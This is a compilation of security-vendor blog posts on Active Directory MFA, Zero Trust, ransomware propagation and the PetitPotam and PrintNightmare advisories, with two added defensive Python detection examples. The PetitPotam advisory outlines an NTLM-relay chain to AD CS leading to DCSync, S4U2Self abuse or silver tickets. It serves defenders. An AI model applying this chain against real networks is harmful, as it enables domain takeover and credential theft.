As IAM and cybersecurity concerns grow with the shift to hybrid environments and remote workforces, it’s only a matter of time until organizations are compelled to confront this issue. By ensuring they have the means of unifying and enforcing policies holistically and consistently, organizations can transform chaos into order. This blog post is excerpted from an article written for Forbes. For the full article, click here. --- - Published: 2021-10-14 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/solving-active-directory-protection-gap-with-mfa-for-rdp-psexec-and-powershell/ While the transition to the cloud and digital transformation are continuously reshaping IT, Active Directory (AD) is still a key component in the environment of almost every organization. The common assumption is that for the foreseeable future most organizations will maintain a mixed on-prem/cloud environment. This introduces a critical security gap: unlike cloud identity providers, AD doesn’t natively support identity protection controls such as MFA, leaving it exposed to attacks that use compromised credentials to access targeted resources. While MFA does exist for local logins and RDP connections, it is absent from key access interfaces such as PsExec, PowerShell remoting and WMI, which are extensively used by threat actors for lateral movement and ransomware deployment. Silverfort’s Unified Identity Protection is the first solution that delivers complete MFA protection for Active Directory environments, eliminating the risk of compromised credentials and introducing cloud-level identity protection and MFA for on-prem environments. A Short MFA Recap – How Does it Work and for What Purpose? In its simplest form, authentication involves a user providing credentials and an identity provider that checks whether the credentials match and, based on the result, either allows or denies access to the requested resource. 
MFA acts as an additional step within this process: following a positive credentials check, the user is required to provide additional proof of identity. In that manner, even if the credentials are compromised, they do not suffice to gain access, materially reducing the risk of such scenarios. So What is the Problem with MFA for Active Directory? Authentication Protocols that don’t Support MFA Since the core Active Directory authentication protocols (NTLM and Kerberos) were designed and built long before MFA existed, there is no native way to add the MFA step described above to the authentication flow. This applies first and foremost to command-line based remote access interfaces such as PsExec, PowerShell remoting (Enter-PSSession, Invoke-Command) and WMI. These interfaces are the tool of choice for system admins and helpdesk staff resolving issues on remote machines, but also for attackers who seek to compromise the network through manual or automated lateral movement. Reliance on Agents and Proxies = Partial Coverage RDP stands out as a relatively secure remote access alternative since it does support placing an MFA step within its authentication flow. However, to apply this protection, one must either install an MFA agent on each protected server or place a proxy in front of each network segment. This almost always results in partial coverage, because agents are never deployed on 100% of the machines and proxies fail to hermetically cover networks that exceed the most basic topology. Silverfort MFA Protection for Active Directory The Silverfort Unified Identity Protection platform delivers end-to-end MFA to Active Directory environments, overcoming the gaps in traditional MFA deployment. Using agentless and proxyless technology, Silverfort analyzes every Active Directory authentication request and, when policy requires it, pushes an MFA notification to the requesting user. 
Only after successful verification does Silverfort instruct Active Directory to let the user access the requested resource. This process is completely agnostic to the access method, enabling Silverfort to extend MFA protection across the following: MFA for PowerShell PowerShell has increasingly become the tool of choice for system administration and includes various cmdlets and utilities for remote access. Unfortunately, its use in cyber attacks has risen in direct proportion. Silverfort enables its users to enforce MFA on PowerShell connections based on either static rules or automated discovery of risk indicators. MFA for RDP Unlike its peers, RDP is not command-line based but enables direct interaction with the remote machine’s GUI. This extends its usage to a large portion of the non-technical members of organizations, especially in the COVID remote workforce era. While traditional MFA can be applied to RDP, it is subject to the limitations of proxies and agents described earlier, almost always resulting in partial coverage that leaves a gap for attackers to take advantage of. In contrast, Silverfort’s agentless and proxyless technology enforces MFA on all RDP connections in the environment to deliver end-to-end coverage. Cool, But Can Silverfort Deliver MFA to Other Access Methods in Active Directory Environments? The concept is simple: if the resource authenticates to Active Directory, Silverfort can enforce MFA. As simple as that. This holds true regardless of the access method. We’ve dedicated space to PowerShell, PsExec and RDP since they are extremely common, but the same protection logic applies equally to any existing or future authentication vector that passes through Active Directory: WMI, database connections, on-prem applications or any other. It is Time to Realize that MFA Protection for Active Directory is a Must Active Directory is here to stay. 
Cyberattacks thrive on the historic absence of active identity protection in Active Directory environments, which in practice means that if a user account’s credentials are compromised, it’s game over. The good news is that we don’t have to accept this anymore: Silverfort makes MFA for Active Directory accessible, comprehensive and easy to deploy, making your organization more resilient to cyberattacks than ever before. Learn more about Silverfort: Agentless MFA Lateral movement protection for Active Directory Ransomware protection --- - Published: 2021-09-20 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/ping-identity-silverfort-identity-centric-zero-trust/ Ping Identity and Silverfort have joined forces to introduce a new approach to Identity-centric Zero Trust security that enables Zero Trust access, offering both higher granularity in terms of risk analysis and relatively rapid and seamless implementation that does not require any IT infrastructure changes. This new offering accelerates your Zero Trust journey with policies that can be configured within minutes, enabling Ping Identity and Silverfort customers to materially strengthen the defenses of their hybrid cloud environments and reduce the risk of a cyberattack. What is Identity-Centric Zero Trust? Today’s enterprise environment includes multiple resources: physical servers, SaaS apps, cloud workloads, file shares, on-prem applications, etc. Identity-centric Zero Trust ensures the following criteria are met: All users are by default not trusted until they are properly authenticated. Once authenticated, user accounts are only authorized for the resource they requested access to. Authentication and authorization are continuous. The user's risk is constantly assessed in the background and their risk score/profile is adjusted accordingly. For example, let’s assume that a remote user has connected by authenticating to the enterprise VPN. 
Once inside the internal environment this user now attempts to access a file server. Identity-centric Zero Trust would evaluate this new access request and determine if it is allowed and would never assume that this user account is trusted based solely on their VPN access. Better Together: Ping Identity & Silverfort Ping Identity delivers intelligent identity solutions for the enterprise. We enable companies to achieve Identity-centric Zero Trust security and more personalized, streamlined user experiences. The PingOne Cloud Platform provides customers, workforce, and partners with access to cloud, mobile, SaaS and on-premises applications across the hybrid enterprise. Over 60% of the Fortune 100 choose us for our identity expertise, open standards, and partnerships with companies including Microsoft and Amazon. We provide flexible identity solutions that accelerate digital business initiatives, delight customers, and secure the enterprise through multi-factor authentication, single sign-on, access management, intelligent API security, directory, and data governance capabilities. For more information, visit www.pingidentity.com. The Silverfort Unified Identity Protection platform utilizes its agentless technology for continuous monitoring, risk analysis and secure access policies on all other resources in the enterprise environment, including core assets that could never have been protected by MFA before, such as legacy homegrown applications, on-prem servers, command line access interfaces and more. Together, Ping Identity and Silverfort provide real-time visibility and control over all authentications and access requests across every type of resource in enterprise environments. We provide the foundations for Identity-centric Zero Trust at scale and a major prerequisite for Zero Trust maturity – complete coverage of every user access to every resource. 
Details of the Integration Ping Identity forwards all access requests to federated applications to Silverfort. This feed provides Silverfort’s risk engine with the full data of every user’s authentication and access attempt activity both on-prem and in the cloud. This data enables the risk engine to perform high-precision risk analysis to reveal the true context of each access attempt and determine whether to grant access, require MFA or deny it altogether. This is the complete Identity-centric Zero Trust flow delivered by Ping Identity and Silverfort: Continuous Monitoring: monitors all access requests, made by all user accounts to any type of on-prem or cloud resource, and creates a comprehensive audit trail. Risk Analysis: covers all individual access attempts and assesses the probability that an attempt is compromised, based on analysis of the user's behavior, the audit trail, and various contextual parameters. Enforcement of Real Time Access Policy: based on the calculated risk score and predefined policy, access can either be granted, denied, or require step-up authentication via MFA. The Business Value of the Integration Together, the Ping Identity and Silverfort integration delivers the following benefits to the business: Simple and Easy Deployment: no infrastructure changes and related downtime are required. All the Zero Trust access policies are delivered by Silverfort on top of the existing identity infrastructure. High granularity: focusing on the user rather than the network ensures risk analysis is granular and carried out on every resource access request. Improved ability to detect anomalies and threats: By definition, an attacker's movement within the enterprise environment is anomalous in comparison to legitimate users. Performing security checks for each resource access increases the likelihood of detecting and preventing malicious activity. Want to learn more? 
Schedule a demo with one of our experts Silverfort + Ping partnership page Ping Integration Directory listing --- - Published: 2021-08-19 - Modified: 2025-07-21 - URL: https://www.silverfort.com/blog/rethinking-ransomware-protection/ Ransomware has gradually evolved since it was first introduced in 2005. In 2013, ransomware attacks began to target the enterprise workforce rather than personal users, with more than 100k new variants in that year alone – a number that has only risen since. In 2017, for the first time, the WannaCry and NotPetya attacks paired ransomware with automated propagation capabilities, shutting down operations of enterprises worldwide and causing approximately $15B in damages. Ransomware attacks can be divided into three stages: delivery of the ransomware payload to the target machine, execution of the payload to encrypt or delete data files on the machine, and propagation of the ransomware across multiple machines within the environment, to encrypt their data files as well. Traditional ransomware attacks operated in one-to-one mode: a compromise of a single machine resulted in data encryption on that machine only. Automated propagation enabled the attacker to exponentially increase their ROI: a compromise of a single machine is now the stepping-stone to compromising all servers and workstations in the environment. Translating ransomware breakdown to actual damage It is easily seen that the price of failure rises with each attack stage. The damage caused by a ransomware attack that succeeds in the Delivery and Execution stages is limited to a single or a few infected machines. Propagation is the X-factor that extends the ransomware damage across wide parts of the targeted organization’s infrastructure. Today, the typical enterprise ransomware protection stack includes security measures against the Delivery and Execution stages. However, most organizations do not have a solution in place for the propagation stage. 
This creates a significant security gap: if a ransomware attack bypasses the Delivery and Execution security controls, it can propagate uninterrupted across the environment. Why is propagation a blind spot, and how can it be solved? In an enterprise environment, connecting from one machine to another involves the first machine authenticating to Active Directory with a username and a credential, whether that is a password, an NTLM hash or a Kerberos ticket. If the credential is valid, Active Directory approves the connection. Ransomware propagation is carried out by connecting to multiple machines with compromised admin credentials. Since these credentials are valid, Active Directory treats each connection as a legitimate authentication and grants the ransomware access. The Silverfort Unified Identity Protection platform integrates with all Identity Providers (IdPs) in the environment to perform continuous monitoring, risk analysis and adaptive access policies on all access attempts, made by all users, to all on-prem and cloud resources. In this way, access to resources is never granted based on credentials alone. Rather, Silverfort's risk analysis determines whether to allow access, augment the authentication with MFA verification, or block the access attempt altogether. The Silverfort Unified Identity Protection Platform Silverfort pioneered the first Unified Identity Protection Platform to protect enterprises against identity-based attacks that exploit compromised credentials to access enterprise resources. Using innovative agentless and proxyless technology, Silverfort natively integrates with all existing IAM solutions to extend secure access controls such as Risk-Based Authentication and MFA across all on-prem and cloud resources. This includes assets that could never have been protected in this way before, such as homegrown/legacy applications, IT infrastructure, file systems, command-line tools, machine-to-machine access, and more. 
Silverfort continuously monitors all access attempts by users and service accounts, and analyzes risks in real time using an AI-based engine to enforce adaptive access policies. Learn more about how the Silverfort Unified Identity Protection Platform prevents ransomware propagation here. --- - Published: 2021-07-27 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-security-advisory-petitpotam-and-printer-bug/ The PetitPotam attack, published on GitHub, coerces a remote server into authenticating to an attacker-chosen target with NTLM, using the MS-EFSRPC call EfsRpcOpenFileRaw. MS-EFSRPC (the Encrypting File System Remote Protocol) is a protocol for managing EFS-encrypted files remotely, and its RPC interface is exposed on domain controllers. Coercing a server into authenticating with NTLM is dangerous because that authentication can be relayed to another service (an NTLM relay attack). A particularly dangerous relay target is Active Directory Certificate Services (AD CS). In their Certified Pre-Owned whitepaper (see ESC8), SpecterOps explain how relaying NTLM to the AD CS web enrollment endpoint lets an attacker take over or impersonate a machine: the coerced machine's NTLM authentication is relayed to the certificate enrollment web pages, and the attacker requests a client certificate for that machine's account. Having obtained the client certificate, the attacker can then use one of the following techniques to take over the domain or the target machine: If the machine is a domain controller or another privileged computer, the attacker can authenticate with the certificate and use its privileges to sync secrets from the directory (DCSync), effectively compromising the domain. The attacker can use S4U2Self to obtain a service ticket to the target machine as any user, including a local administrator. The attacker can use PKINIT to authenticate with the certificate and recover the machine account's NT hash, and then forge a silver ticket for that machine. The Printer Bug This vulnerability is related to but different from the Printer Bug (presented at DerbyCon 2018 by Lee Christensen and Will Schroeder), which allows an attacker to trigger an NTLM authentication from any machine running the Print Spooler service, via the MS-RPRN call RpcRemoteFindFirstPrinterChangeNotificationEx. 
The mitigations provided below will prevent both PetitPotam and the Printer Bug from being used to relay NTLM to the AD CS server, but will not block an NTLM relay attack against a different target (for example, relaying to LDAP or SMB on another host). Since multiple Print Spooler vulnerabilities have been published lately, we recommend disabling the Print Spooler on all member servers and domain controllers that do not need printing. Microsoft Guidance Microsoft has stated that it will not fix this behavior as a vulnerability, but advises several possible mitigations (see KB5005413, "Mitigating NTLM Relay Attacks on Active Directory Certificate Services"). The most far-reaching is to completely disable NTLM in the domain. In my experience, that's not practical advice: NTLM usually accounts for a double-digit percentage of all authentication in the network, and reducing it to zero is rarely feasible. The next option is to restrict incoming NTLM traffic to the AD CS server. If blocking NTLM for the entire server is too harsh, Microsoft explains how to disable NTLM for the "Certificate Authority Web Enrollment" or "Certificate Enrollment Web Service" sites at the IIS level. Microsoft also recommends enabling Extended Protection for Authentication (EPA) for those AD CS web services; EPA binds the NTLM authentication to the TLS channel so that a relayed authentication is rejected, which in turn requires that the enrollment endpoints be served over HTTPS only. Silverfort Guidance The tricky part about Microsoft's recommendations is choosing the mitigation that's right for your environment. We recommend the following for Silverfort customers: List all AD CS servers in your domain; a quick heuristic is the membership of the Cert Publishers security group, which enterprise CAs join when installed (confirm the list against the pKIEnrollmentService objects under CN=Public Key Services in the Configuration partition). For each, filter the Silverfort log for NTLM authentication to that server. If there is no NTLM authentication to any of the AD CS servers, disable inbound NTLM on the AD CS servers. Otherwise, follow Microsoft's instructions for enabling EPA for AD CS, and work on moving the remaining NTLM clients to Kerberos so that NTLM can eventually be disabled there as well. 
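The audit described in the Silverfort guidance above, as an added example in Python that is not part of the original post and not Silverfort's code: the AD CS host list (assumed here to come from Cert Publishers membership), the host-to-address map and the authentication records are constructed sample data, and the field names are an assumption rather than Silverfort's log schema. It goes slightly beyond the post's all-or-nothing rule by reporting per server, so a CA that nothing talks to over NTLM can have inbound NTLM restricted even while another CA still needs EPA, and it adds one check the post does not spell out: a machine account authenticating to the CA with NTLM from an address that is not its own, which is what a coerced-and-relayed authentication looks like from the CA's side.

```python
from collections import Counter

# Constructed data for the example (not real Silverfort output).
# ADCS_SERVERS is assumed to be derived from Cert Publishers membership;
# HOST_ADDR maps machine names to their addresses so a machine account
# arriving from the wrong address stands out.
ADCS_SERVERS = {"ca01", "ca02"}
HOST_ADDR = {"dc01": "10.0.0.10", "ca01": "10.0.0.30", "ca02": "10.0.0.31", "ws17": "10.0.1.17"}

AUTH_LOG = [
    {"account": "CORP\\jdoe",    "src_ip": "10.0.1.17", "dst": "ca01", "protocol": "NTLM",     "service": "HTTP"},
    {"account": "CORP\\DC01$",   "src_ip": "10.0.0.10", "dst": "ca01", "protocol": "Kerberos", "service": "RPCSS"},
    {"account": "CORP\\DC01$",   "src_ip": "10.0.5.99", "dst": "ca01", "protocol": "NTLM",     "service": "HTTP"},
    {"account": "CORP\\jdoe",    "src_ip": "10.0.1.17", "dst": "fs01", "protocol": "NTLM",     "service": "CIFS"},
    {"account": "CORP\\svc_pki", "src_ip": "10.0.1.17", "dst": "ca02", "protocol": "Kerberos", "service": "HTTP"},
]


def _is_ntlm_to_adcs(rec, adcs_servers):
    return rec["dst"] in adcs_servers and rec["protocol"].upper() == "NTLM"


def ntlm_to_adcs(log, adcs_servers):
    """Count NTLM authentications per AD CS server; servers with none are reported as 0."""
    counts = Counter({server: 0 for server in adcs_servers})
    for rec in log:
        if _is_ntlm_to_adcs(rec, adcs_servers):
            counts[rec["dst"]] += 1
    return dict(counts)


def recommend(log, adcs_servers):
    """The rule from the post (no NTLM anywhere -> disable it, otherwise EPA), plus a per-server view."""
    counts = ntlm_to_adcs(log, adcs_servers)
    per_server = {
        server: ("disable inbound NTLM" if n == 0 else "enable EPA (and require HTTPS) on web enrollment")
        for server, n in counts.items()
    }
    overall = ("disable inbound NTLM on all AD CS servers" if not any(counts.values())
               else "enable EPA on AD CS web enrollment")
    return {"per_server": per_server, "overall": overall}


def ntlm_users_of_adcs(log, adcs_servers):
    """Accounts still using NTLM against AD CS: the list to move to Kerberos before NTLM is blocked."""
    return sorted({rec["account"] for rec in log if _is_ntlm_to_adcs(rec, adcs_servers)})


def relay_indicators(log, adcs_servers, host_addr):
    """Machine-account NTLM to an AD CS server from an address that is not the machine's own.
    A coerced DC whose authentication is relayed by an attacker shows up exactly like this."""
    hits = []
    for rec in log:
        acct = rec["account"].split("\\")[-1]
        if _is_ntlm_to_adcs(rec, adcs_servers) and acct.endswith("$"):
            expected = host_addr.get(acct[:-1].lower())
            if expected != rec["src_ip"]:
                hits.append(rec)
    return hits


if __name__ == "__main__":
    print(ntlm_to_adcs(AUTH_LOG, ADCS_SERVERS))
    print(recommend(AUTH_LOG, ADCS_SERVERS))
    print(ntlm_users_of_adcs(AUTH_LOG, ADCS_SERVERS))
    print(relay_indicators(AUTH_LOG, ADCS_SERVERS, HOST_ADDR))
```

On a real network the Cert Publishers membership comes from Get-ADGroupMember "Cert Publishers", and the authentication records from the Silverfort log export or from Security event 4624 on the CA itself (AuthenticationPackageName NTLM, client address in IpAddress). The machine-account check assumes the log carries the client's source address; a domain controller behind a NAT or load balancer needs its translated addresses added to the map, or the check will raise false alarms.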
--- - Published: 2021-07-01 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-proactively-prevents-exploitation-of-printnightmare-vulnerability/ A vulnerability in the Windows Print Spooler could allow remote code execution as SYSTEM by authenticated domain users on Windows systems. Details and a proof-of-concept for the vulnerability have been leaked on the internet. The vulnerability is being called "PrintNightmare." Print Spooler, which is turned on by default in Microsoft Windows, is a Windows service responsible for managing all print jobs sent to the computer's printers or to print servers. Successful exploitation of this vulnerability could open the door to complete system takeover by remote adversaries: a remote, authenticated attacker could run code with elevated rights on a machine with the Print Spooler service enabled. When Microsoft released an advisory about a similar vulnerability in the Print Spooler (CVE-2021-1675), security researchers accidentally released details of PrintNightmare (CVE-2021-34527). An attacker can exploit this vulnerability to take control of an affected system. Silverfort Protection Against PrintNightmare Exploitation Silverfort's Unified Identity Protection can deliver full protection against such exploits with a simple risk-based authentication policy applied to systems running the Print Spooler service. In this manner, any malicious access attempt by adversaries will trigger an MFA notification to the actual compromised user, which in practice eliminates the possibility of leveraging this vulnerability to gain access to additional resources. Silverfort's solution can enforce modern secure access controls such as MFA on common access interfaces in Active Directory environments, materially increasing their resilience to identity attacks that use compromised credentials to access enterprise resources. 
“Silverfort’s ability to enforce modern secure access controls such as MFA on common access interfaces in Active Directory environment is a game changer,” said Yaron Kassner, Co-Founder and CTO of Silverfort. “Nearly all post-exploitation TTPs rely on the assumption that their targets lack the ability to prevent malicious authentications in real time. The PrintNightmare exploit is another great example of the security gap we’re addressing.” Silverfort Security Guidance Reduce the Attack Surface Scan all machines in your environment to find where the Windows Print Spooler service is enabled. You can start by scanning your domain controllers with Silverfort's free Vulnerability Assessment tool. Disable the Windows Print Spooler service on domain controllers and other systems that do not print. Disable inbound remote printing (the "Allow Print Spooler to accept client connections" Group Policy setting) on computers that do print but are not accessed remotely for printing. Reduce membership of the groups indicated in Microsoft’s guidance (see the Mitigations section) as much as possible. Disable inbound remote printing on all machines except print servers. Create a Risk-Based Policy Assign a risk-based access policy that enforces MFA on any NTLM connection to machines where the Windows Print Spooler service is enabled. After you follow the guidance above, this should be limited to print servers. Create the policy for any user with risk score ‘Medium’ and above. The published PrintNightmare exploits authenticate to the spooler's RPC interface with NTLM, typically via pass-the-hash, so this policy would block high-risk access by any attacker attempting to exploit the vulnerability against target resources. This is what the policy would look like: In the Advanced Settings, configure the policy to require MFA every 12 hours: To cover exploit variants that authenticate with Kerberos instead of NTLM, you can also create a matching policy for CIFS Kerberos service tickets (the spooler's RPC interface is reachable over the SMB named pipe \pipe\spoolss). Want to learn more? Schedule a demo with one of our experts. 
--- - Published: 2021-06-29 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/prevent-automated-propagation-of-ransomware-attacks/ Ransomware attacks rank high among enterprises’ cybersecurity concerns. The common practice today is to protect against the delivery and execution stages of these attacks. However, nearly all enterprises lack the ability to proactively prevent the automated propagation of ransomware payload that has managed to bypass the delivery and execution protection. Since this propagation is the difference between a single infected endpoint and a mass enterprise lockdown, lacking the ability to prevent this is a critical security gap. Silverfort’s Unified Identity Protection platform delivers the only solution today that can utilize MFA to effectively prevent automated ransomware propagation, never allowing the malicious payload to expand beyond the initially infected machine. Automated Propagation is the X Factor in Ransomware Attacks Ransomware attacks transformed from a nuisance to a critical risk in 2017, when the WannaCry and NotPetya attacks wreaked havoc among enterprises across the globe, with overall estimated damages of close to $15B. These attacks were the first to couple an encryption payload with automated propagation. In this manner, social engineering a single enterprise worker to open a weaponized email resulted in data encryption of not only this worker’s endpoint alone, but all other machines in the enterprise environment. This new reality forced enterprise security decision makers to reprioritize their security needs, pushing enterprise ransomware protection to the top of their list. Ransomware Attack Anatomy: Delivery, Execution, Propagation Ransomware attacks comprise the following consecutive stages: Delivery Protection - Checked The purpose of the delivery stage is to place the ransomware payload on the target’s machine. 
There are various methods for attackers to achieve this, with weaponized phishing emails, compromised RDP access and watering holes leading the list. The table below, taken from the Statista website, shows a more detailed distribution of delivery vectors: Protection against ransomware delivery is carried out by email security gateways that scan emails to detect and remove risky content prior to user interaction, endpoint protection platforms that prevent the download of potential malware, and MFA on RDP connections, which prevents attackers from connecting with compromised credentials. Execution Protection – Checked The Execution stage is when the ransomware payload that was successfully delivered to the workstation or server starts running with the intent to encrypt the data files on the machine. This table, assembled by Kaspersky Labs, shows the top-performing ransomware families: Enterprises protect against the Execution stage by deploying Endpoint Protection Platforms (EPP) on their workstations and servers. The EPP aims to terminate any process it detects as ransomware, preventing the malicious encryption altogether. Propagation Protection – The Blind Spot! The propagation stage is where the ransomware payload is copied to many other machines in the enterprise environment via malicious authentication with compromised credentials. One of the most exposed attack surfaces is shared folders: in an enterprise environment every user has access to at least some of them, paving the way for ransomware to propagate. As we have explained before, this is the stage where the mass damage is caused. However, this stage today is a blind spot in enterprises’ security posture. There is no security solution today that is capable of preventing automated ransomware propagation in real time. 
In practice, it means that if a ransomware variant succeeds in bypassing the Delivery and Execution security measures – and a certain percentage of variants always do – it can propagate within the enterprise environment, encrypting any machine it can reach. And while EPPs are getting better at protecting against new strains of malware, threat actors are crafting more evasive and stealthy payloads, making such a bypass a high-probability scenario. What is the Challenge in Protecting Against Automated Ransomware Propagation? To better understand the root cause of this security gap, let’s examine how automated ransomware propagation works. We have the patient-zero endpoint where the ransomware payload was initially executed. In order to propagate to other machines in the environment, the malware uses compromised credentials and performs a standard authentication, presenting the other machine with a valid (yet compromised) username and credential. While this activity is 100% malicious in its context, on the wire it is identical to any legitimate authentication in the environment. The Identity Provider – Active Directory in this case – has no way to identify the malicious context and will approve the connection. So here is the blind spot in ransomware protection: on the one hand, no security product other than the Identity Provider sits inline and can block authentications in real time, and on the other, the Identity Provider itself has no ability to discern between legitimate authentications and malicious ones. This is where the Silverfort Unified Identity Protection platform comes into play. The Solution: Unified Identity Protection Platform Silverfort has pioneered the first purpose-built Unified Identity Protection platform that proactively prevents attacks that utilize compromised credentials to access enterprise resources. 
Silverfort utilizes innovative, agentless technology to natively integrate with the Identity Providers in the enterprise environment to apply continuous monitoring, risk analysis and access policy enforcement on each and every access attempt to any on-prem or cloud resource. In this way, Silverfort extends Risk-Based Authentication and MFA to resources and access interfaces that could never have been protected before, including the Active Directory command-line remote access interfaces upon which automated ransomware propagation relies. So How Does Silverfort Deliver Real Time Protection Against Automated Ransomware Propagation? As we’ve explained earlier, automated propagation uses authentication with compromised credentials to spread in the targeted environment, with a special inclination towards shared folders. Let’s understand how Silverfort addresses this risk: Continuous Monitoring Silverfort continuously analyzes user accounts’ authentications and access attempts, building up a high-precision behavior profile of both users’ and machines’ normal activities. Risk Analysis In the case of automated propagation, there will be multiple near-simultaneous login attempts to many different machines, all originating from a single source machine and user account. Silverfort’s risk engine will immediately identify this anomalous behavior and increase both the user account’s and the machine’s risk score. Access Policy Enforcement Silverfort enables users to create access policies that use its real-time risk score to trigger a protective action: stepping up authentication with MFA or even blocking the access altogether. The policy against automated ransomware propagation would require MFA whenever a user account’s risk score is either ‘High’ or ‘Critical’, and would apply to all access interfaces – PowerShell, CMD and CIFS (SMB), the protocol used for shared access to network folders. 
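The three steps just described (continuous monitoring, risk analysis, policy enforcement), as an added example in Python that is not Silverfort's code and does not reproduce its risk engine: it keeps a sliding-window count of distinct destination hosts per (source machine, account) over a constructed stream of authentication events and applies the policy from the text, requiring MFA on PowerShell, CMD and CIFS connections once the computed risk is High or Critical. The window length, the two thresholds and the event fields are assumptions, not Silverfort's tuning or schema. The decision is made per event, so the example also shows where in the spray the containment actually kicks in, and it covers the same propagation scenario described in the earlier rethinking-ransomware post.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed tuning values for the example, not Silverfort's real thresholds.
WINDOW = timedelta(seconds=60)   # look-back window per (source host, account)
HIGH_AT = 4                      # distinct destinations in the window -> risk 'High'
CRITICAL_AT = 8                  # distinct destinations in the window -> risk 'Critical'
PROTECTED = {"CIFS", "PowerShell", "CMD"}   # access interfaces the policy applies to


def make_sample_events():
    """Constructed authentication events: a legitimate admin session and a
    patient-zero workstation spraying CIFS connections with stolen credentials."""
    t0 = datetime(2021, 6, 29, 9, 0, 0)
    events = []
    # admin touches three servers over ten minutes
    for i, dst in enumerate(["srv01", "srv02", "srv03"]):
        events.append({"ts": t0 + timedelta(minutes=3 * i), "src": "admin-ws",
                       "account": "CORP\\adm.lee", "dst": dst, "proto": "PowerShell"})
    # ransomware on ws23 hits twelve file servers in twelve seconds with jdoe's credentials
    for i in range(12):
        events.append({"ts": t0 + timedelta(minutes=4, seconds=i), "src": "ws23",
                       "account": "CORP\\jdoe", "dst": f"fs{i:02d}", "proto": "CIFS"})
    return sorted(events, key=lambda e: e["ts"])


def risk_for(distinct_destinations):
    """Map the fan-out observed in the window to the risk levels the policy uses."""
    if distinct_destinations >= CRITICAL_AT:
        return "Critical"
    if distinct_destinations >= HIGH_AT:
        return "High"
    return "Low"


def evaluate_stream(events):
    """Process events in time order and return (event, risk, action) per event.
    action is 'mfa' when the policy steps up the authentication, otherwise 'allow'."""
    recent = defaultdict(deque)   # (src, account) -> deque of (ts, dst) inside WINDOW
    decisions = []
    for ev in events:
        window = recent[(ev["src"], ev["account"])]
        window.append((ev["ts"], ev["dst"]))
        while window and ev["ts"] - window[0][0] > WINDOW:
            window.popleft()                       # drop events older than the window
        distinct = len({dst for _, dst in window})
        risk = risk_for(distinct)
        step_up = risk in ("High", "Critical") and ev["proto"] in PROTECTED
        decisions.append((ev, risk, "mfa" if step_up else "allow"))
    return decisions


def summarize(decisions):
    """Per (src, account): how many connections were allowed, how many required MFA, peak risk."""
    order = {"Low": 0, "High": 1, "Critical": 2}
    out = defaultdict(lambda: {"allow": 0, "mfa": 0, "peak_risk": "Low"})
    for ev, risk, action in decisions:
        entry = out[(ev["src"], ev["account"])]
        entry[action] += 1
        if order[risk] > order[entry["peak_risk"]]:
            entry["peak_risk"] = risk
    return dict(out)


if __name__ == "__main__":
    for key, stats in summarize(evaluate_stream(make_sample_events())).items():
        print(key, stats)
```

With these thresholds the patient-zero host reaches three file servers before the fourth connection trips the High risk level; every further connection demands MFA from the real account owner, who will not approve a prompt for a session they did not start, while the admin touching three servers over ten minutes never leaves Low. Tune the thresholds against your own baseline before enforcing: backup servers, vulnerability scanners and software distribution points legitimately fan out to many hosts and need an allow-list or a dedicated service-account policy.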
With this policy enabled, whenever the ransomware attempts to expand to another machine, the connection would not be permitted without MFA verification of the actual users whose credentials were compromised. Effectively, it means that the propagation would be prevented, and the attack would be contained to the single, patient-zero endpoint. Conclusion: It Takes a Dedicated Identity Protection Approach to Prevent Automated Propagation Automated propagation is the most lethal component in ransomware attacks and is the key game changer in the risk they introduce to enterprises today. With Silverfort’s Unified Identity Protection platform you can finally have this critical blind spot covered and checked, materially increasing your enterprise’s resilience to attempted ransomware attacks. --- - Published: 2021-06-03 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/three-reasons-private-sector-should-notice-cybersecurity-eo/ The recent Executive Order, signed by President Biden in May 2021, is a response to a series of high-profile cyberattacks on targets such as SolarWinds, Microsoft Exchange, and most recently, the Colonial Pipeline. Realizing that information-sharing and stronger cybersecurity standards are critical to maintaining a strong defense in an evolving threat environment, the federal government has mandated measures to implement security best practices. What Changed? Without public trust in the nation’s digital infrastructure, the engines of global commerce and government services are at risk. This executive order has addressed the issue not with a generalized call to improve security, but rather specific technologies that once implemented, stand the best chance of preventing future attacks. To encourage this tightening of security, the US government is stepping forward to "lead by example" by adopting these measures throughout the public sector. 
To maximize the initiative's impact, however, the Executive Order calls on both the public and private sectors to reach a standardized technological baseline that will enable coordination in reporting incidents and preventing threats. This also means that security measures once thought of as nice-to-have roadmap features will now need to be implemented with far greater urgency.

### Three Things You Need to Know

#### If you work with or plan to work with the federal sector, you'll need to be compliant

Standards implemented at the federal level will become the baseline for what is considered a strong cybersecurity posture throughout the private sector. In fact, the Executive Order explicitly states that the "private sector must adapt to the continuously changing threat environment, ensure its products are built and operate securely, and partner with the Federal Government to foster a more secure cyberspace." Specifically, the field-tested building blocks of identity protection (multi-factor authentication, risk-based authentication and conditional access) will become a standard, both for networks in the federal domain and for the vendors with whom the US government contracts for services.

#### Security is a major barrier to adoption of cloud technologies

The Executive Order mandates "accelerating movement to secure cloud services". Full network protection, however, requires uniform security capabilities not only on cloud services but also on the on-premises assets that often make up part of a hybrid network. Typically, a hybrid network has multiple IAM products, each managed separately and offering varying levels of security. Consolidating security controls across all resources and access attempts is essential for identifying and managing cybersecurity risks. With a unified identity protection framework in place, assets can be migrated to the cloud with confidence that they will remain secure.
#### Zero Trust approaches are becoming a new standard

Developing a plan to implement Zero Trust Architecture is mandated by this Executive Order, so this stance is quickly moving from concept to reality. Until today, the prevalent approach was Zero Trust Network Access (ZTNA), which focuses on the device and the network segment it is attempting to access. This can be difficult to implement in enterprise environments without rebuilding networks. Another approach gaining interest is Identity-Based Zero Trust, which considers the user's identity and behavior profile to determine the risk level and applies dynamic, risk-based access controls. Each access attempt is evaluated individually; a user's identity is never fully trusted until they prove they are indeed who they claim to be.

---

- Published: 2021-04-29
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-researchers-discover-kdc-spoofing-vulnerability-in-f5-big-ip-cve-2021-23008/

